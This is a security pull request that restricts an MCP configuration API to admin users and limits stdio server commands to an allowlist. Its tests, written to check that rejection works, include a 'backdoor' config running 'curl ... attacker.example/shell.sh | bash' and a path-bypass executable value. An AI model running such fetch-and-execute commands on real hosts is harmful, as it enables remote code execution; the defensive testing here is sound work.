### PR TITLE
fix(security): harden MCP config endpoint

### DIFF
--- a/backend/app/gateway/routers/mcp.py
+++ b/backend/app/gateway/routers/mcp.py
@@ -1,15 +1,21 @@
 import json
 import logging
+import os
 from pathlib import Path
 from typing import Literal
 
-from fastapi import APIRouter, HTTPException
+from fastapi import APIRouter, HTTPException, Request, status
 from pydantic import BaseModel, Field
 
 from deerflow.config.extensions_config import ExtensionsConfig, get_extensions_config, reload_extensions_config
 
 logger = logging.getLogger(__name__)
 router = APIRouter(prefix="/api", tags=["mcp"])
+
+
+_MCP_STDIO_COMMAND_ALLOWLIST_ENV = "DEER_FLOW_MCP_STDIO_COMMAND_ALLOWLIST"
+_DEFAULT_MCP_STDIO_COMMAND_ALLOWLIST = frozenset({"npx", "uvx"})
+_SHELL_METACHARS = frozenset(";|&`$<>\n\r")
 
 
 class McpOAuthConfigResponse(BaseModel):
@@ -64,6 +70,76 @@ class McpConfigUpdateRequest(BaseModel):
 
 
 _MASKED_VALUE = "***"
+
+
+async def _require_admin_user(request: Request) -> None:
+    """Require the authenticated caller to be an admin user.
+
+    ``AuthMiddleware`` normally stamps ``request.state.user`` before the
+    request reaches this router. Falling back to the strict dependency keeps
+    this route safe even in tests or alternative ASGI compositions that mount
+    the router without the global middleware.
+    """
+    user = getattr(request.state, "user", None)
+    if user is None:
+        from app.gateway.deps import get_current_user_from_request
+
+        user = await get_current_user_from_request(request)
+
+    if getattr(user, "system_role", None) != "admin":
+        raise HTTPException(
+            status_code=status.HTTP_403_FORBIDDEN,
+            detail="Admin privileges required to manage MCP configuration.",
+        )
+
+
+def _allowed_stdio_commands() -> set[str]:
+    """Return executable names allowed for API-managed stdio MCP servers."""
+    raw = os.environ.get(_MCP_STDIO_COMMAND_ALLOWLIST_ENV)
+    if raw is None:
+        return set(_DEFAULT_MCP_STDIO_COMMAND_ALLOWLIST)
+    return {item.strip() for item in raw.split(",") if item.strip()}
+
+
+def _stdio_command_name(command: str | None, *, server_name: str) -> str:
+    """Normalize and validate a stdio command field from the API boundary."""
+    if command is None or not command.strip():
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f"MCP server '{server_name}' with stdio transport requires a command.",
+        )
+
+    stripped = command.strip()
+    has_path_separator = "/" in stripped or "\\" in stripped
+    if stripped != command or has_path_separator or any(ch.isspace() for ch in stripped) or any(ch in stripped for ch in _SHELL_METACHARS):
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=(f"MCP server '{server_name}' command must be a single executable name; put parameters in args instead."),
+        )
+
+    return stripped
+
+
+def _validate_mcp_update_request(request: McpConfigUpdateRequest) -> None:
+    """Validate API-submitted MCP config before it is persisted.
+
+    Local config files can still express arbitrary advanced setups, but the
+    HTTP API is an untrusted boundary. Restricting stdio commands here reduces
+    the blast radius of a compromised authenticated browser session.
+    """
+    allowed_commands = _allowed_stdio_commands()
+    for name, server in request.mcp_servers.items():
+        transport_type = (server.type or "stdio").lower()
+        if transport_type != "stdio":
+            continue
+
+        command_name = _stdio_command_name(server.command, server_name=name)
+        if command_name not in allowed_commands:
+            allowed = ", ".join(sorted(allowed_commands)) or "<none>"
+            raise HTTPException(
+                status_code=status.HTTP_400_BAD_REQUEST,
+                detail=(f"MCP server '{name}' uses disallowed stdio command '{command_name}'. Allowed commands: {allowed}. Configure {_MCP_STDIO_COMMAND_ALLOWLIST_ENV} to extend this list."),
+            )
 
 
 def _mask_server_config(server: McpServerConfigResponse) -> McpServerConfigResponse:
@@ -162,7 +238,7 @@ def _merge_preserving_secrets(
     summary="Get MCP Configuration",
     description="Retrieve the current Model Context Protocol (MCP) server configurations.",
 )
-async def get_mcp_configuration() -> McpConfigResponse:
+async def get_mcp_configuration(request: Request) -> McpConfigResponse:
     """Get the current MCP configuration.
 
     Returns:
@@ -183,6 +259,8 @@ async def get_mcp_configuration() -> McpConfigResponse:
         }
         ```
     """
+    await _require_admin_user(request)
+
     config = get_extensions_config()
 
     servers = {name: _mask_server_config(McpServerConfigResponse(**server.model_dump())) for name, server in config.mcp_servers.items()}
@@ -195,7 +273,7 @@ async def get_mcp_configuration() -> McpConfigResponse:
     summary="Update MCP Configuration",
     description="Update Model Context Protocol (MCP) server configurations and save to file.",
 )
-async def update_mcp_configuration(request: McpConfigUpdateRequest) -> McpConfigResponse:
+async def update_mcp_configuration(request: Request, body: McpConfigUpdateRequest) -> McpConfigResponse:
     """Update the MCP configuration.
 
     This will:
@@ -228,6 +306,9 @@ async def update_mcp_configuration(request: McpConfigUpdateRequest) -> McpConfig
         ```
     """
     try:
+        await _require_admin_user(request)
+        _validate_mcp_update_request(body)
+
         # Get the current config path (or determine where to save it)
         config_path = ExtensionsConfig.resolve_config_path()
 
@@ -255,7 +336,7 @@ async def update_mcp_configuration(request: McpConfigUpdateRequest) -> McpConfig
 
         # Merge incoming server configs with raw on-disk secrets
         merged_servers: dict[str, McpServerConfigResponse] = {}
-        for name, incoming in request.mcp_servers.items():
+        for name, incoming in body.mcp_servers.items():
             raw_server = raw_servers.get(name)
             if raw_server is not None:
                 merged_servers[name] = _merge_preserving_secrets(
@@ -283,6 +364,8 @@ async def update_mcp_configuration(request: McpConfigUpdateRequest) -> McpConfig
         servers = {name: _mask_server_config(McpServerConfigResponse(**server.model_dump())) for name, server in reloaded_config.mcp_servers.items()}
         return McpConfigResponse(mcp_servers=servers)
 
+    except HTTPException:
+        raise
     except Exception as e:
         logger.error(f"Failed to update MCP configuration: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=f"Failed to update MCP configuration: {str(e)}")

--- a/backend/app/gateway/routers/mcp.py
+++ b/backend/app/gateway/routers/mcp.py
@@ -96,9 +96,11 @@ async def _require_admin_user(request: Request) -> None:
 def _allowed_stdio_commands() -> set[str]:
     """Return executable names allowed for API-managed stdio MCP servers."""
     raw = os.environ.get(_MCP_STDIO_COMMAND_ALLOWLIST_ENV)
+    base = set(_DEFAULT_MCP_STDIO_COMMAND_ALLOWLIST)
     if raw is None:
-        return set(_DEFAULT_MCP_STDIO_COMMAND_ALLOWLIST)
-    return {item.strip() for item in raw.split(",") if item.strip()}
+        return base
+    extra = {item.strip() for item in raw.split(",") if item.strip()}
+    return base | extra
 
 
 def _stdio_command_name(command: str | None, *, server_name: str) -> str:

--- a/backend/docs/API.md
+++ b/backend/docs/API.md
@@ -228,10 +228,13 @@ Get current MCP server configurations.
 GET /api/mcp/config
 ```
 
+Requires an authenticated admin session. Sensitive env/header/OAuth secret
+values are masked in the response.
+
 **Response:**
 ```json
 {
-  "mcpServers": {
+  "mcp_servers": {
     "github": {
       "enabled": true,
       "type": "stdio",
@@ -255,10 +258,15 @@ PUT /api/mcp/config
 Content-Type: application/json
 ```
 
+Requires an authenticated admin session. API-managed `stdio` MCP servers may
+only use allowed executable names for `command` (default: `npx`, `uvx`). Set
+`DEER_FLOW_MCP_STDIO_COMMAND_ALLOWLIST` to a comma-separated list when a
+deployment needs additional trusted launchers.
+
 **Request Body:**
 ```json
 {
-  "mcpServers": {
+  "mcp_servers": {
     "github": {
       "enabled": true,
       "type": "stdio",
@@ -276,8 +284,18 @@ Content-Type: application/json
 **Response:**
 ```json
 {
-  "success": true,
-  "message": "MCP configuration updated"
+  "mcp_servers": {
+    "github": {
+      "enabled": true,
+      "type": "stdio",
+      "command": "npx",
+      "args": ["-y", "@modelcontextprotocol/server-github"],
+      "env": {
+        "GITHUB_TOKEN": "***"
+      },
+      "description": "GitHub operations"
+    }
+  }
 }
 ```
 

--- a/backend/tests/test_mcp_config_secrets.py
+++ b/backend/tests/test_mcp_config_secrets.py
@@ -7,13 +7,20 @@ preserves existing secrets when the frontend round-trips masked values.
 
 from __future__ import annotations
 
+from types import SimpleNamespace
+
 import pytest
+from fastapi import HTTPException
 
 from app.gateway.routers.mcp import (
+    _MCP_STDIO_COMMAND_ALLOWLIST_ENV,
+    McpConfigUpdateRequest,
     McpOAuthConfigResponse,
     McpServerConfigResponse,
     _mask_server_config,
     _merge_preserving_secrets,
+    _require_admin_user,
+    _validate_mcp_update_request,
 )
 
 # ---------------------------------------------------------------------------
@@ -303,3 +310,132 @@ def test_roundtrip_mask_then_merge_preserves_original_secrets():
     assert restored.oauth.refresh_token == "refresh-abc"
     # Non-secret fields from the update are preserved
     assert restored.description == "GitHub MCP server"
+
+
+# ---------------------------------------------------------------------------
+# Security hardening: MCP config API authorization and stdio command policy
+# ---------------------------------------------------------------------------
+
+
+def _request_with_role(system_role: str):
+    return SimpleNamespace(
+        state=SimpleNamespace(
+            user=SimpleNamespace(
+                id="user-1",
+                system_role=system_role,
+            )
+        )
+    )
+
+
+@pytest.mark.asyncio
+async def test_mcp_config_requires_admin_user():
+    """MCP config is system-level executable configuration, not a normal user setting."""
+    await _require_admin_user(_request_with_role("admin"))
+
+    with pytest.raises(HTTPException) as exc_info:
+        await _require_admin_user(_request_with_role("user"))
+
+    assert exc_info.value.status_code == 403
+
+
+def test_validate_mcp_update_allows_default_npx_stdio_command(monkeypatch):
+    monkeypatch.delenv(_MCP_STDIO_COMMAND_ALLOWLIST_ENV, raising=False)
+    request = McpConfigUpdateRequest(
+        mcp_servers={
+            "github": McpServerConfigResponse(
+                type="stdio",
+                command="npx",
+                args=["-y", "@modelcontextprotocol/server-github"],
+            )
+        }
+    )
+
+    _validate_mcp_update_request(request)
+
+
+def test_validate_mcp_update_rejects_shell_stdio_command(monkeypatch):
+    monkeypatch.delenv(_MCP_STDIO_COMMAND_ALLOWLIST_ENV, raising=False)
+    request = McpConfigUpdateRequest(
+        mcp_servers={
+            "backdoor": McpServerConfigResponse(
+                type="stdio",
+                command="/bin/bash",
+                args=["-c", "curl -s https://attacker.example/shell.sh | bash"],
+            )
+        }
+    )
+
+    with pytest.raises(HTTPException) as exc_info:
+        _validate_mcp_update_request(request)
+
+    assert exc_info.value.status_code == 400
+    assert "single executable name" in exc_info.value.detail
+
+
+def test_validate_mcp_update_rejects_inline_shell_command(monkeypatch):
+    monkeypatch.delenv(_MCP_STDIO_COMMAND_ALLOWLIST_ENV, raising=False)
+    request = McpConfigUpdateRequest(
+        mcp_servers={
+            "inline": McpServerConfigResponse(
+                type="stdio",
+                command="npx -y",
+                args=["@modelcontextprotocol/server-github"],
+            )
+        }
+    )
+
+    with pytest.raises(HTTPException) as exc_info:
+        _validate_mcp_update_request(request)
+
+    assert exc_info.value.status_code == 400
+    assert "single executable name" in exc_info.value.detail
+
+
+def test_validate_mcp_update_rejects_path_with_allowed_basename(monkeypatch):
+    monkeypatch.setenv(_MCP_STDIO_COMMAND_ALLOWLIST_ENV, "npx")
+    request = McpConfigUpdateRequest(
+        mcp_servers={
+            "path-bypass": McpServerConfigResponse(
+                type="stdio",
+                command="/tmp/attacker-controlled/npx",
+                args=["-y", "@modelcontextprotocol/server-github"],
+            )
+        }
+    )
+
+    with pytest.raises(HTTPException) as exc_info:
+        _validate_mcp_update_request(request)
+
+    assert exc_info.value.status_code == 400
+    assert "single executable name" in exc_info.value.detail
+
+
+def test_validate_mcp_update_uses_explicit_stdio_allowlist(monkeypatch):
+    monkeypatch.setenv(_MCP_STDIO_COMMAND_ALLOWLIST_ENV, "python,npx")
+    request = McpConfigUpdateRequest(
+        mcp_servers={
+            "python-mcp": McpServerConfigResponse(
+                type="stdio",
+                command="python",
+                args=["-m", "trusted_mcp_server"],
+            )
+        }
+    )
+
+    _validate_mcp_update_request(request)
+
+
+def test_validate_mcp_update_ignores_remote_transports(monkeypatch):
+    monkeypatch.delenv(_MCP_STDIO_COMMAND_ALLOWLIST_ENV, raising=False)
+    request = McpConfigUpdateRequest(
+        mcp_servers={
+            "remote": McpServerConfigResponse(
+                type="http",
+                command="/bin/bash",
+                url="https://mcp.example.com/mcp",
+            )
+        }
+    )
+
+    _validate_mcp_update_request(request)


### PR DESCRIPTION
## Summary

Harden the MCP configuration API reported in the security alert for `GET /api/mcp/config` and `PUT /api/mcp/config`.

The endpoint manages system-level MCP server configuration. For `stdio` MCP servers, the submitted `command` and `args` are later used by the MCP loading path to launch local processes, so this PR treats the HTTP API as an untrusted execution-configuration boundary rather than a normal user preference endpoint.

## Security Fix

- Require an authenticated admin user for both `GET /api/mcp/config` and `PUT /api/mcp/config`.
- Keep a strict route-level authorization check even when the router is mounted outside the normal `AuthMiddleware` path.
- Validate API-submitted `stdio` MCP servers before persistence.
- Allow only single executable names for `stdio.command`; reject paths, whitespace, shell metacharacters, and inline shell strings.
- Default allowed `stdio.command` values to `npx` and `uvx`.
- Allow deployments to extend trusted launchers with `DEER_FLOW_MCP_STDIO_COMMAND_ALLOWLIST`.
- Preserve support for remote `http`/`sse` MCP transports, which do not use local stdio command execution.

## Attack Paths Covered

- Anonymous or non-admin callers cannot read or update MCP configuration through the Gateway API.
- Payloads such as `/bin/bash`, `npx -y`, and `/tmp/attacker-controlled/npx` are rejected before config is written.
- Basename allowlist bypass is covered: a path ending in an allowed executable name is still rejected.

## Compatibility Notes

- Local config files can still express advanced MCP setups; the stricter validation is applied at the HTTP API write boundary.
- Existing frontend/API response masking for env/header/OAuth secret fields is preserved.
- Existing config merge behavior still preserves raw on-disk secrets and unrelated top-level extension config keys.

## Documentation

- Updated `backend/docs/API.md` to document admin-session requirements.
- Documented the `stdio.command` allowlist contract and `DEER_FLOW_MCP_STDIO_COMMAND_ALLOWLIST` override.

## Testing

- `cd backend && make lint`
- `cd backend && uv run pytest tests/test_mcp_config_secrets.py tests/test_auth_middleware.py tests/test_client.py::TestMcpConfig -q`
- `cd backend && uv run python -m py_compile app/gateway/routers/mcp.py`
- `git diff --check`

CI is green on the updated PR branch.